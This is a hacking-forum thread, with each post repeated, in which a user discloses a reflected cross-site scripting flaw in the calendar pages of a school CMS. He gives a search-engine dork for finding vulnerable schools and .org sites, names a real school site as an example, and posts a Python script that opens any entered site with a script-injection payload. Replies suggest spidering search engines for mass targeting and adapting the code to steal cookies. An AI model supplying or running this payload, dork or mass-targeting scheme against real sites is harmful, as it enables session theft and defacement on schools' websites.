[VipVince]

Shame this time its not persistent, I originally found a persistent XSS on this software in the eventform.php file. There is records for this on exploit.db. This times its a non persistent but it remains in dozens and dozens of schools and .org sites.

Exploit:
/old_core/cal/month.php?cid=
/old_core/cal/day.php?catid=
/old_core/cal/week.php?catid=

The y parameter is vulnerable to XSS. If you are too lazy to do manually, here is a python script to do it for you .

Code:

#!/usr/bin/python
import sys
import webbrowser
import urllib2
    
print "######################################"
print "#SchoolCMS auto-XSS inject script    #"
print "#Dork: inurl:/old_core/cal/month.php #"
print "#Author: VipVince                    #"
print "#Vendor: www.poweritschools.com      #"
print "#                                    #"
print "######################################"
    
print "XSS lies in y=parameter of the URL in the calender. (Year)"
print "After dorking a site, Enter URL like: www.oaklandschoolsnj.org"
print "Let the script do the rest ;)"

payload = "/old_core/cal/month.php?cid=&catid=&m=-1&w=5&y=<script>alert(1)</script>"
site = raw_input('Enter site to XSS: ')
inject = webbrowser.open(site+payload)
raw_input("Press any key to exit ")

Enjoy

[VipVince]

Shame this time its not persistent, I originally found a persistent XSS on this software in the eventform.php file. There is records for this on exploit.db. This times its a non persistent but it remains in dozens and dozens of schools and .org sites.

Exploit:
/old_core/cal/month.php?cid=
/old_core/cal/day.php?catid=
/old_core/cal/week.php?catid=

The y parameter is vulnerable to XSS. If you are too lazy to do manually, here is a python script to do it for you .

Code:

#!/usr/bin/python
import sys
import webbrowser
import urllib2
    
print "######################################"
print "#SchoolCMS auto-XSS inject script    #"
print "#Dork: inurl:/old_core/cal/month.php #"
print "#Author: VipVince                    #"
print "#Vendor: www.poweritschools.com      #"
print "#                                    #"
print "######################################"
    
print "XSS lies in y=parameter of the URL in the calender. (Year)"
print "After dorking a site, Enter URL like: www.oaklandschoolsnj.org"
print "Let the script do the rest ;)"

payload = "/old_core/cal/month.php?cid=&catid=&m=-1&w=5&y=<script>alert(1)</script>"
site = raw_input('Enter site to XSS: ')
inject = webbrowser.open(site+payload)
raw_input("Press any key to exit ")

Enjoy

[noize]

It looks like you're looking for vulnerabilities in any kind of CMS.

What if you made a script parsing lists of sites and testing to find what sites use this CMS and are thus vulnerable to this vulnerability? Not enough challenging? What if you made a spider using search engines to find new sites and you checked to find which ones are vulnerable? Too much challenging? If you choose to make something like this and need some help on any point, just give a call, I'd like to help out as I can.

[noize]

It looks like you're looking for vulnerabilities in any kind of CMS.

What if you made a script parsing lists of sites and testing to find what sites use this CMS and are thus vulnerable to this vulnerability? Not enough challenging? What if you made a spider using search engines to find new sites and you checked to find which ones are vulnerable? Too much challenging? If you choose to make something like this and need some help on any point, just give a call, I'd like to help out as I can.

[VipVince]

It looks like you're looking for vulnerabilities in any kind of CMS.

What if you made a script parsing lists of sites and testing to find what sites use this CMS and are thus vulnerable to this vulnerability? Not enough challenging? What if you made a spider using search engines to find new sites and you checked to find which ones are vulnerable? Too much challenging? If you choose to make something like this and need some help on any point, just give a call, I'd like to help out as I can.

This lies in a particular cms made by powerITschools in the month.php file. The dork will find you dozens of websites running it. Thanks for the suggestions, I will look into them.

[VipVince]

It looks like you're looking for vulnerabilities in any kind of CMS.

What if you made a script parsing lists of sites and testing to find what sites use this CMS and are thus vulnerable to this vulnerability? Not enough challenging? What if you made a spider using search engines to find new sites and you checked to find which ones are vulnerable? Too much challenging? If you choose to make something like this and need some help on any point, just give a call, I'd like to help out as I can.

This lies in a particular cms made by powerITschools in the month.php file. The dork will find you dozens of websites running it. Thanks for the suggestions, I will look into them.

[Megamente]

Let's adapt that code to borrow some cookies

[Megamente]

Let's adapt that code to borrow some cookies

[Megamente]

Let's adapt that code to borrow some cookies